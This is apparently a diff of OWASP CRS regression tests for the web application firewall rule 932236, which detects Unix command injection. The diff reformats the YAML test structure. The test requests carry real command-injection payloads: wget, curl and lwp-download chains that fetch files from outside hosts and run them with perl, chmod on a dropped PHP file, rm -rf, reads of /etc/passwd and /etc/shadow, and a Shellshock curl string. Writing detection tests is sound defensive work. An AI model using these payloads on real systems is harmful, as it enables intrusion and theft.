desc: "ANQ9SN3S" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=flock -u / whoami - output: - log_contains: id "932236" - - test_title: 932236-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=flock -u / whoami + output: + log_contains: id "932236" + - test_id: 16 desc: "JW2SU88A" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cat /path/file.gz - output: - log_contains: id "932236" - - test_title: 932236-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cat /path/file.gz + output: + log_contains: id "932236" + - test_id: 17 desc: "P6E0KY27" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cpulimit -l 100 -f whoami - output: - log_contains: id "932236" - - test_title: 932236-18 + - input: + dest_addr: 127.0.0.1 + headers: + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cpulimit -l 100 -f whoami + output: + log_contains: id "932236" + - test_id: 18 desc: "FP agains 'fi' without word boundary" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?field_metatags[0][advanced][rights]=somevalue" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?field_metatags[0][advanced][rights]=somevalue" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 19 desc: "FP MailerUI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=MailerUI" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=MailerUI" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 20 desc: "FP tasksListView" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - 
Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=tasksListView" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=tasksListView" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 21 desc: System Command Injection (932236) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 22 desc: System Command Injection (932236) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 23 desc: arg value of ";ifconfig Something „The Title”. After space or new line more characters" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + log_contains: id "932236" 
+ - test_id: 24 desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 25 desc: Positive test - RCE passed in one of the args stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: | - 
arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: | + arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 26 desc: RCE from test 932236.yaml combined with html entities in the middle stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 27 desc: RCE from test 932236.yaml combined with html entities at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 28 desc: RCE from test 932236.yaml combined with html entities at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 29 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - 
test_title: 932236-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 30 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 31 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: 
- - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 32 desc: RCE ;top with html entities two digit decimal of 59 (;) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%26%2359%3B+;top" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%26%2359%3B+;top" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 33 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 34 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 35 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 36 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 37 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br 
